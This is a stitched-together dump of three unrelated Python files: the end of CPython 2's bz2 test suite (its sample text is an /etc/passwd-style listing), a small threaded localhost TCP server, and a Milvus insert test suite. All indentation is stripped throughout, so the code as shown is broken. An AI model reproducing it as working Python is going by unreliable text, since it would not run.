TEXT = 'root:x:0:0:root:/root:/bin/bash\nbin:x:1:1:bin:/bin:\ndaemon:x:2:2:daemon:/sbin:\nadm:x:3:4:adm:/var/adm:\nlp:x:4:7:lp:/var/spool/lpd:\nsync:x:5:0:sync:/sbin:/bin/sync\nshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown\nhalt:x:7:0:halt:/sbin:/sbin/halt\nmail:x:8:12:mail:/var/spool/mail:\nnews:x:9:13:news:/var/spool/news:\nuucp:x:10:14:uucp:/var/spool/uucp:\noperator:x:11:0:operator:/root:\ngames:x:12:100:games:/usr/games:\ngopher:x:13:30:gopher:/usr/lib/gopher-data:\nftp:x:14:50:FTP User:/var/ftp:/bin/bash\nnobody:x:65534:65534:Nobody:/home:\npostfix:x:100:101:postfix:/var/spool/postfix:\nniemeyer:x:500:500::/home/niemeyer:/bin/bash\npostgres:x:101:102:PostgreSQL Server:/var/lib/pgsql:/bin/bash\nmysql:x:102:103:MySQL server:/var/lib/mysql:/bin/bash\nwww:x:103:104::/var/www:/bin/false\n'
DATA = 'BZh91AY&SY.\xc8N\x18\x00\x01>_\x80\x00\x10@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe00\x01\x99\xaa\x00\xc0\x03F\x86\x8c#&\x83F\x9a\x03\x06\xa6\xd0\xa6\x93M\x0fQ\xa7\xa8\x06\x804hh\x12$\x11\xa4i4\xf14S\xd2<Q\xb5\x0fH\xd3\xd4\xdd\xd5\x87\xbb\xf8\x94\r\x8f\xafI\x12\xe1\xc9\xf8/E\x00pu\x89\x12]\xc9\xbbDL\nQ\x0e\t1\x12\xdf\xa0\xc0\x97\xac2O9\x89\x13\x94\x0e\x1c7\x0ed\x95I\x0c\xaaJ\xa4\x18L\x10\x05#\x9c\xaf\xba\xbc/\x97\x8a#C\xc8\xe1\x8cW\xf9\xe2\xd0\xd6M\xa7\x8bXa<e\x84t\xcbL\xb3\xa7\xd9\xcd\xd1\xcb\x84.\xaf\xb3\xab\xab\xad`n}\xa0lh\tE,\x8eZ\x15\x17VH>\x88\xe5\xcd9gd6\x0b\n\xe9\x9b\xd5\x8a\x99\xf7\x08.K\x8ev\xfb\xf7xw\xbb\xdf\xa1\x92\xf1\xdd|/";\xa2\xba\x9f\xd5\xb1#A\xb6\xf6\xb3o\xc9\xc5y\\\xebO\xe7\x85\x9a\xbc\xb6f8\x952\xd5\xd7"%\x89>V,\xf7\xa6z\xe2\x9f\xa3\xdf\x11\x11"\xd6E)I\xa9\x13^\xca\xf3r\xd0\x03U\x922\xf26\xec\xb6\xed\x8b\xc3U\x13\x9d\xc5\x170\xa4\xfa^\x92\xacDF\x8a\x97\xd6\x19\xfe\xdd\xb8\xbd\x1a\x9a\x19\xa3\x80ankR\x8b\xe5\xd83]\xa9\xc6\x08\x82f\xf6\xb9"6l$\xb8j@\xc0\x8a\xb0l1..\xbak\x83ls\x15\xbc\xf4\xc1\x13\xbe\xf8E\xb8\x9d\r\xa8\x9dk\x84\xd3n\xfa\xacQ\x07\xb1%y\xaav\xb4\x08\xe0z\x1b\x16\xf5\x04\xe9\xcc\xb9\x08z\x1en7.G\xfc]\xc9\x14\xe1B@\xbb!8`'
DATA_CRLF = 'BZh91AY&SY\xaez\xbbN\x00\x01H\xdf\x80\x00\x12@\x02\xff\xf0\x01\x07n\x00?\xe7\xff\xe0@\x01\xbc\xc6`\x86*\x8d=M\xa9\x9a\x86\xd0L@\x0fI\xa6!\xa1\x13\xc8\x88jdi\x8d@\x03@\x1a\x1a\x0c\x0c\x83 \x00\xc4h2\x19\x01\x82D\x84e\t\xe8\x99\x89\x19\x1ah\x00\r\x1a\x11\xaf\x9b\x0fG\xf5(\x1b\x1f?\t\x12\xcf\xb5\xfc\x95E\x00ps\x89\x12^\xa4\xdd\xa2&\x05(\x87\x04\x98\x89u\xe40%\xb6\x19\'\x8c\xc4\x89\xca\x07\x0e\x1b!\x91UIFU%C\x994!DI\xd2\xfa\xf0\xf1N8W\xde\x13A\xf5\x9cr%?\x9f3;I45A\xd1\x8bT\xb1<l\xba\xcb_\xc00xY\x17r\x17\x88\x08\x08@\xa0\ry@\x10\x04$)`\xf2\xce\x89z\xb0s\xec\x9b.iW\x9d\x81\xb5-+t\x9f\x1a\'\x97dB\xf5x\xb5\xbe.[.\xd7\x0e\x81\xe7\x08\x1cN`\x88\x10\xca\x87\xc3!"\x80\x92R\xa1/\xd1\xc0\xe6mf\xac\xbd\x99\xcca\xb3\x8780>\xa4\xc7\x8d\x1a\\"\xad\xa1\xabyBg\x15\xb9l\x88\x88\x91k"\x94\xa4\xd4\x89\xae*\xa6\x0b\x10\x0c\xd6\xd4m\xe86\xec\xb5j\x8a\x86j\';\xca.\x01I\xf2\xaaJ\xe8\x88\x8cU+t3\xfb\x0c\n\xa33\x13r2\r\x16\xe0\xb3(\xbf\x1d\x83r\xe7M\xf0D\x1365\xd8\x88\xd3\xa4\x92\xcb2\x06\x04\\\xc1\xb0\xea//\xbek&\xd8\xe6+t\xe5\xa1\x13\xada\x16\xder5"w]\xa2i\xb7[\x97R \xe2IT\xcd;Z\x04dk4\xad\x8a\t\xd3\x81z\x10\xf1:^`\xab\x1f\xc5\xdc\x91N\x14$+\x9e\xae\xd3\x80'
if has_cmdline_bunzip2:
def decompress(self, data):
pop = subprocess.Popen("bunzip2", shell=True,
stdin=subprocess.PIPE,
stdout=subprocess.PIPE,
stderr=subprocess.STDOUT)
pop.stdin.write(data)
pop.stdin.close()
ret = pop.stdout.read()
pop.stdout.close()
if pop.wait() != 0:
ret = bz2.decompress(data)
return ret
else:
# bunzip2 isn't available to run on Windows.
def decompress(self, data):
return bz2.decompress(data)
class BZ2FileTest(BaseTest):
"Test BZ2File type miscellaneous methods."
def setUp(self):
self.filename = TESTFN
def tearDown(self):
if os.path.isfile(self.filename):
os.unlink(self.filename)
def createTempFile(self, crlf=0):
f = open(self.filename, "wb")
if crlf:
data = self.DATA_CRLF
else:
data = self.DATA
f.write(data)
f.close()
def testRead(self):
# "Test BZ2File.read()"
self.createTempFile()
bz2f = BZ2File(self.filename)
self.assertRaises(TypeError, bz2f.read, None)
self.assertEqual(bz2f.read(), self.TEXT)
bz2f.close()
def testReadChunk10(self):
# "Test BZ2File.read() in chunks of 10 bytes"
self.createTempFile()
bz2f = BZ2File(self.filename)
text = ''
while 1:
str = bz2f.read(10)
if not str:
break
text += str
self.assertEqual(text, text)
bz2f.close()
def testRead100(self):
# "Test BZ2File.read(100)"
self.createTempFile()
bz2f = BZ2File(self.filename)
self.assertEqual(bz2f.read(100), self.TEXT[:100])
bz2f.close()
def testReadLine(self):
# "Test BZ2File.readline()"
self.createTempFile()
bz2f = BZ2File(self.filename)
self.assertRaises(TypeError, bz2f.readline, None)
sio = StringIO(self.TEXT)
for line in sio.readlines():
self.assertEqual(bz2f.readline(), line)
bz2f.close()
def testReadLines(self):
# "Test BZ2File.readlines()"
self.createTempFile()
bz2f = BZ2File(self.filename)
self.assertRaises(TypeError, bz2f.readlines, None)
sio = StringIO(self.TEXT)
self.assertEqual(bz2f.readlines(), sio.readlines())
bz2f.close()
def testIterator(self):
# "Test iter(BZ2File)"
self.createTempFile()
bz2f = BZ2File(self.filename)
sio = StringIO(self.TEXT)
self.assertEqual(list(iter(bz2f)), sio.readlines())
bz2f.close()
def testClosedIteratorDeadlock(self):
# "Test that iteration on a closed bz2file releases the lock."
# http://bugs.python.org/issue3309
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.close()
self.assertRaises(ValueError, bz2f.next)
# This call will deadlock of the above .next call failed to
# release the lock.
self.assertRaises(ValueError, bz2f.readlines)
def testXReadLines(self):
# "Test BZ2File.xreadlines()"
self.createTempFile()
bz2f = BZ2File(self.filename)
sio = StringIO(self.TEXT)
self.assertEqual(list(bz2f.xreadlines()), sio.readlines())
bz2f.close()
def testUniversalNewlinesLF(self):
# "Test BZ2File.read() with universal newlines (\\n)"
self.createTempFile()
bz2f = BZ2File(self.filename, "rU")
self.assertEqual(bz2f.read(), self.TEXT)
self.assertEqual(bz2f.newlines, "\n")
bz2f.close()
def testUniversalNewlinesCRLF(self):
# "Test BZ2File.read() with universal newlines (\\r\\n)"
self.createTempFile(crlf=1)
bz2f = BZ2File(self.filename, "rU")
self.assertEqual(bz2f.read(), self.TEXT)
self.assertEqual(bz2f.newlines, "\r\n")
bz2f.close()
def testWrite(self):
# "Test BZ2File.write()"
bz2f = BZ2File(self.filename, "w")
self.assertRaises(TypeError, bz2f.write)
bz2f.write(self.TEXT)
bz2f.close()
f = open(self.filename, 'rb')
self.assertEqual(self.decompress(f.read()), self.TEXT)
f.close()
def testWriteChunks10(self):
# "Test BZ2File.write() with chunks of 10 bytes"
bz2f = BZ2File(self.filename, "w")
n = 0
while 1:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
bz2f.write(str)
n += 1
bz2f.close()
f = open(self.filename, 'rb')
self.assertEqual(self.decompress(f.read()), self.TEXT)
f.close()
def testWriteLines(self):
# "Test BZ2File.writelines()"
bz2f = BZ2File(self.filename, "w")
self.assertRaises(TypeError, bz2f.writelines)
sio = StringIO(self.TEXT)
bz2f.writelines(sio.readlines())
bz2f.close()
# patch #1535500
self.assertRaises(ValueError, bz2f.writelines, ["a"])
f = open(self.filename, 'rb')
self.assertEqual(self.decompress(f.read()), self.TEXT)
f.close()
def testWriteMethodsOnReadOnlyFile(self):
bz2f = BZ2File(self.filename, "w")
bz2f.write("abc")
bz2f.close()
bz2f = BZ2File(self.filename, "r")
self.assertRaises(IOError, bz2f.write, "a")
self.assertRaises(IOError, bz2f.writelines, ["a"])
def testSeekForward(self):
# "Test BZ2File.seek(150, 0)"
self.createTempFile()
bz2f = BZ2File(self.filename)
self.assertRaises(TypeError, bz2f.seek)
bz2f.seek(150)
self.assertEqual(bz2f.read(), self.TEXT[150:])
bz2f.close()
def testSeekBackwards(self):
# "Test BZ2File.seek(-150, 1)"
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.read(500)
bz2f.seek(-150, 1)
self.assertEqual(bz2f.read(), self.TEXT[500-150:])
bz2f.close()
def testSeekBackwardsFromEnd(self):
# "Test BZ2File.seek(-150, 2)"
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.seek(-150, 2)
self.assertEqual(bz2f.read(), self.TEXT[len(self.TEXT)-150:])
bz2f.close()
def testSeekPostEnd(self):
# "Test BZ2File.seek(150000)"
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), "")
bz2f.close()
def testSeekPostEndTwice(self):
# "Test BZ2File.seek(150000) twice"
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.seek(150000)
bz2f.seek(150000)
self.assertEqual(bz2f.tell(), len(self.TEXT))
self.assertEqual(bz2f.read(), "")
bz2f.close()
def testSeekPreStart(self):
# "Test BZ2File.seek(-150, 0)"
self.createTempFile()
bz2f = BZ2File(self.filename)
bz2f.seek(-150)
self.assertEqual(bz2f.tell(), 0)
self.assertEqual(bz2f.read(), self.TEXT)
bz2f.close()
def testOpenDel(self):
# "Test opening and deleting a file many times"
self.createTempFile()
for i in xrange(10000):
o = BZ2File(self.filename)
del o
def testOpenNonexistent(self):
# "Test opening a nonexistent file"
self.assertRaises(IOError, BZ2File, "/non/existent")
def testModeU(self):
# Bug #1194181: bz2.BZ2File opened for write with mode "U"
self.createTempFile()
bz2f = BZ2File(self.filename, "U")
bz2f.close()
f = file(self.filename)
f.seek(0, 2)
self.assertEqual(f.tell(), len(self.DATA))
f.close()
def testBug1191043(self):
# readlines() for files containing no newline
data = 'BZh91AY&SY\xd9b\x89]\x00\x00\x00\x03\x80\x04\x00\x02\x00\x0c\x00 \x00!\x9ah3M\x13<]\xc9\x14\xe1BCe\x8a%t'
f = open(self.filename, "wb")
f.write(data)
f.close()
bz2f = BZ2File(self.filename)
lines = bz2f.readlines()
bz2f.close()
self.assertEqual(lines, ['Test'])
bz2f = BZ2File(self.filename)
xlines = list(bz2f.xreadlines())
bz2f.close()
self.assertEqual(xlines, ['Test'])
def testContextProtocol(self):
# BZ2File supports the context management protocol
f = None
with BZ2File(self.filename, "wb") as f:
f.write(b"xxx")
f = BZ2File(self.filename, "rb")
f.close()
try:
with f:
pass
except ValueError:
pass
else:
self.fail("__enter__ on a closed file didn't raise an exception")
try:
with BZ2File(self.filename, "wb") as f:
1 // 0
except ZeroDivisionError:
pass
else:
self.fail("1 // 0 didn't raise an exception")
@unittest.skipUnless(threading, 'Threading required for this test.')
def testThreading(self):
# Using a BZ2File from several threads doesn't deadlock (issue #7205).
data = "1" * 2**20
nthreads = 10
f = bz2.BZ2File(self.filename, 'wb')
try:
def comp():
for i in range(5):
f.write(data)
threads = [threading.Thread(target=comp) for i in range(nthreads)]
for t in threads:
t.start()
for t in threads:
t.join()
finally:
f.close()
class BZ2CompressorTest(BaseTest):
def testCompress(self):
# "Test BZ2Compressor.compress()/flush()"
bz2c = BZ2Compressor()
self.assertRaises(TypeError, bz2c.compress)
data = bz2c.compress(self.TEXT)
data += bz2c.flush()
self.assertEqual(self.decompress(data), self.TEXT)
def testCompressChunks10(self):
# "Test BZ2Compressor.compress()/flush() with chunks of 10 bytes"
bz2c = BZ2Compressor()
n = 0
data = ''
while 1:
str = self.TEXT[n*10:(n+1)*10]
if not str:
break
data += bz2c.compress(str)
n += 1
data += bz2c.flush()
self.assertEqual(self.decompress(data), self.TEXT)
class BZ2DecompressorTest(BaseTest):
def test_Constructor(self):
self.assertRaises(TypeError, BZ2Decompressor, 42)
def testDecompress(self):
# "Test BZ2Decompressor.decompress()"
bz2d = BZ2Decompressor()
self.assertRaises(TypeError, bz2d.decompress)
text = bz2d.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressChunks10(self):
# "Test BZ2Decompressor.decompress() with chunks of 10 bytes"
bz2d = BZ2Decompressor()
text = ''
n = 0
while 1:
str = self.DATA[n*10:(n+1)*10]
if not str:
break
text += bz2d.decompress(str)
n += 1
self.assertEqual(text, self.TEXT)
def testDecompressUnusedData(self):
# "Test BZ2Decompressor.decompress() with unused data"
bz2d = BZ2Decompressor()
unused_data = "this is unused data"
text = bz2d.decompress(self.DATA+unused_data)
self.assertEqual(text, self.TEXT)
self.assertEqual(bz2d.unused_data, unused_data)
def testEOFError(self):
# "Calling BZ2Decompressor.decompress() after EOS must raise EOFError"
bz2d = BZ2Decompressor()
text = bz2d.decompress(self.DATA)
self.assertRaises(EOFError, bz2d.decompress, "anything")
class FuncTest(BaseTest):
"Test module functions"
def testCompress(self):
# "Test compress() function"
data = bz2.compress(self.TEXT)
self.assertEqual(self.decompress(data), self.TEXT)
def testDecompress(self):
# "Test decompress() function"
text = bz2.decompress(self.DATA)
self.assertEqual(text, self.TEXT)
def testDecompressEmpty(self):
# "Test decompress() function with empty string"
text = bz2.decompress("")
self.assertEqual(text, "")
def testDecompressIncomplete(self):
# "Test decompress() function with incomplete data"
self.assertRaises(ValueError, bz2.decompress, self.DATA[:-10])
def test_main():
test_support.run_unittest(
BZ2FileTest,
BZ2CompressorTest,
BZ2DecompressorTest,
FuncTest
)
test_support.reap_children()
if __name__ == '__main__':
test_main()
# vim:ts=4:sw=4
|
server.py
|
import socket
import threading
import socketserver
import logging as log
from tcp_request_handler import TCPRequestHandler as RequestHandler
class ThreadTcpServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
pass
if __name__ == '__main__':
log.basicConfig(level=log.DEBUG)
host, port = "localhost", 8888
server = ThreadTcpServer((host, port), RequestHandler)
server_thread = threading.Thread(target=server.serve_forever)
server_thread.daemon = True
server_thread.start()
log.debug('Server started in {}:{}! '.format(host, port))
input()
server.shutdown()
|
test_insert.py
|
from ssl import ALERT_DESCRIPTION_UNKNOWN_PSK_IDENTITY
import threading
import numpy as np
import pandas as pd
import random
import pytest
from pymilvus import Index, DataType
from pymilvus.exceptions import MilvusException
from base.client_base import TestcaseBase
from utils.util_log import test_log as log
from common import common_func as cf
from common import common_type as ct
from common.common_type import CaseLabel, CheckTasks
prefix = "insert"
exp_name = "name"
exp_schema = "schema"
exp_num = "num_entities"
exp_primary = "primary"
default_schema = cf.gen_default_collection_schema()
default_binary_schema = cf.gen_default_binary_collection_schema()
default_index_params = {"index_type": "IVF_SQ8", "metric_type": "L2", "params": {"nlist": 64}}
default_binary_index_params = {"index_type": "BIN_IVF_FLAT", "metric_type": "JACCARD", "params": {"nlist": 64}}
default_search_exp = "int64 >= 0"
class TestInsertParams(TestcaseBase):
""" Test case of Insert interface """
@pytest.fixture(scope="function", params=ct.get_invalid_strs)
def get_non_data_type(self, request):
if isinstance(request.param, list) or request.param is None:
pytest.skip("list and None type is valid data type")
yield request.param
@pytest.fixture(scope="module", params=ct.get_invalid_strs)
def get_invalid_field_name(self, request):
if isinstance(request.param, (list, dict)):
pytest.skip()
yield request.param
@pytest.mark.tags(CaseLabel.L0)
def test_insert_dataframe_data(self):
"""
target: test insert DataFrame data
method: 1.create collection
2.insert dataframe data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_list_data(self):
"""
target: test insert list-like data
method: 1.create 2.insert list data
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L2)
def test_insert_non_data_type(self, get_non_data_type):
"""
target: test insert with non-dataframe, non-list data
method: insert with data (non-dataframe and non-list type)
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "Data type is not support"}
collection_w.insert(data=get_non_data_type, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
@pytest.mark.parametrize("data", [[], pd.DataFrame()])
def test_insert_empty_data(self, data):
"""
target: test insert empty data
method: insert empty
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
error = {ct.err_code: 0, ct.err_msg: "The data fields number is not match with schema"}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_dataframe_only_columns(self):
"""
target: test insert with dataframe just columns
method: dataframe just have columns
expected: num entities is zero
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
columns = [ct.default_int64_field_name, ct.default_float_vec_field_name]
df = pd.DataFrame(columns=columns)
error = {ct.err_code: 0, ct.err_msg: "Cannot infer schema from empty dataframe"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_empty_field_name_dataframe(self):
"""
target: test insert empty field name df
method: dataframe with empty column
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: ' '}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_invalid_field_name_dataframe(self, get_invalid_field_name):
"""
target: test insert with invalid dataframe data
method: insert with invalid field name dataframe
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_int64_field_name: get_invalid_field_name}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: "The types of schema and data do not match"}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
def test_insert_dataframe_index(self):
"""
target: test insert dataframe with index
method: insert dataframe with index
expected: todo
"""
pass
@pytest.mark.tags(CaseLabel.L2)
def test_insert_none(self):
"""
target: test insert None
method: data is None
expected: return successfully with zero results
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
mutation_res, _ = collection_w.insert(data=None)
assert mutation_res.insert_count == 0
assert len(mutation_res.primary_keys) == 0
assert collection_w.is_empty
assert collection_w.num_entities == 0
@pytest.mark.tags(CaseLabel.L1)
def test_insert_numpy_data(self):
"""
target: test insert numpy.ndarray data
method: 1.create by schema 2.insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_numpy_data(nb=10)
collection_w.insert(data=data)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_binary_dataframe(self):
"""
target: test insert binary dataframe
method: 1. create by schema 2. insert dataframe
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=df)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == df[ct.default_int64_field_name].values.tolist()
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_binary_data(self):
"""
target: test insert list-like binary data
method: 1. create by schema 2. insert data
expected: assert num_entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
data, _ = cf.gen_default_binary_list_data(ct.default_nb)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == ct.default_nb
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == ct.default_nb
@pytest.mark.tags(CaseLabel.L0)
def test_insert_single(self):
"""
target: test insert single
method: insert one entity
expected: verify num
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=1)
mutation_res, _ = collection_w.insert(data=data)
assert mutation_res.insert_count == 1
assert mutation_res.primary_keys == data[0]
assert collection_w.num_entities == 1
@pytest.mark.tags(CaseLabel.L2)
def test_insert_dim_not_match(self):
"""
target: test insert with not match dim
method: insert data dim not equal to schema dim
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
dim = 129
df = cf.gen_default_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_binary_dim_not_match(self):
"""
target: test insert binary with dim not match
method: insert binary data dim not equal to schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name, schema=default_binary_schema)
dim = 120
df, _ = cf.gen_default_binary_dataframe_data(ct.default_nb, dim=dim)
error = {ct.err_code: 1,
ct.err_msg: f'Collection field dim is {ct.default_dim}, but entities field dim is {dim}'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_field_name_not_match(self):
"""
target: test insert field name not match
method: data field name not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(10)
df.rename(columns={ct.default_float_field_name: "int"}, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_field_value_not_match(self):
"""
target: test insert data value not match
method: insert data value type not match schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
df = cf.gen_default_dataframe_data(nb)
new_float_value = pd.Series(data=[float(i) for i in range(nb)], dtype="float64")
df.iloc[:, 1] = new_float_value
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_value_less(self):
"""
target: test insert value less than other
method: int field value less than vec-field value
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb - 1)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_vector_value_less(self):
"""
target: test insert vector value less than other
method: vec field value less than int field
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb - 1, ct.default_dim)
data = [int_values, float_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'Arrays must all be same length.'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_fields_more(self):
"""
target: test insert with fields more
method: field more than schema fields
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
new_values = [i for i in range(ct.default_nb)]
df.insert(3, 'new', new_values)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_fields_less(self):
"""
target: test insert with fields less
method: fields less than schema fields
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
df = cf.gen_default_dataframe_data(ct.default_nb)
df.drop(ct.default_float_vec_field_name, axis=1, inplace=True)
error = {ct.err_code: 0, ct.err_msg: 'The data fields number is not match with schema.'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_list_order_inconsistent_schema(self):
"""
target: test insert data fields order inconsistent with schema
method: insert list data, data fields order inconsistent with schema
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = [i for i in range(nb)]
float_values = [np.float32(i) for i in range(nb)]
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
data = [float_values, int_values, float_vec_values]
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
def test_insert_dataframe_order_inconsistent_schema(self):
"""
target: test insert with dataframe fields inconsistent with schema
method: insert dataframe, and fields order inconsistent with schema
expected: assert num entities
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
nb = 10
int_values = pd.Series(data=[i for i in range(nb)])
float_values = pd.Series(data=[float(i) for i in range(nb)], dtype="float32")
float_vec_values = cf.gen_vectors(nb, ct.default_dim)
df = pd.DataFrame({
ct.default_float_field_name: float_values,
ct.default_float_vec_field_name: float_vec_values,
ct.default_int64_field_name: int_values
})
error = {ct.err_code: 0, ct.err_msg: 'The types of schema and data do not match'}
collection_w.insert(data=df, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L2)
def test_insert_inconsistent_data(self):
"""
target: test insert with inconsistent data
method: insert with data that same field has different type data
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
data = cf.gen_default_list_data(nb=100)
data[0][1] = 1.0
error = {ct.err_code: 0, ct.err_msg: "The data in the same column must be of the same type"}
collection_w.insert(data, check_task=CheckTasks.err_res, check_items=error)
class TestInsertOperation(TestcaseBase):
"""
******************************************************************
The following cases are used to test insert interface operations
******************************************************************
"""
@pytest.fixture(scope="function", params=[8, 4096])
def dim(self, request):
yield request.param
@pytest.mark.tags(CaseLabel.L2)
def test_insert_without_connection(self):
"""
target: test insert without connection
method: insert after remove connection
expected: raise exception
"""
c_name = cf.gen_unique_str(prefix)
collection_w = self.init_collection_wrap(name=c_name)
self.connection_wrap.remove_connection(ct.default_alias)
res_list, _ = self.connection_wrap.list_connections()
assert ct.default_alias not in res_list
data = cf.gen_default_list_data(10)
error = {ct.err_code: 0, ct.err_msg: 'should create connect first'}
collection_w.insert(data=data, check_task=CheckTasks.err_res, check_items=error)
@pytest.mark.tags(CaseLabel.L1)
@pytest.mark.skip("https://github.com/milvus-io/milvus/issues/12680")
@pytest.mark.parametrize("vec_fields", [[cf.gen_float_vec_field(name="float_vector1")],
[cf.gen_binary_vec_field()],
[cf.gen_binary_vec_field(), cf.gen_binary_vec_field("binary_vec")]])
def test_insert_multi_float_vec_fields(self, vec_fields):
"""
target: test insert into multi float vec fields collection
method: create collection with different schema and insert
expected: verify num entities
"""
schema = cf.gen_schema_multi_vector_fields(vec_fields)
collection_w = self.init_collection_wrap(name=cf.gen_unique_str(prefix), schema=schema)
df = cf.gen_dataframe_multi_vec_fields(vec_fields=vec_fields)
collection_w.insert(df)
assert collection_w.num_entities == ct.default_nb
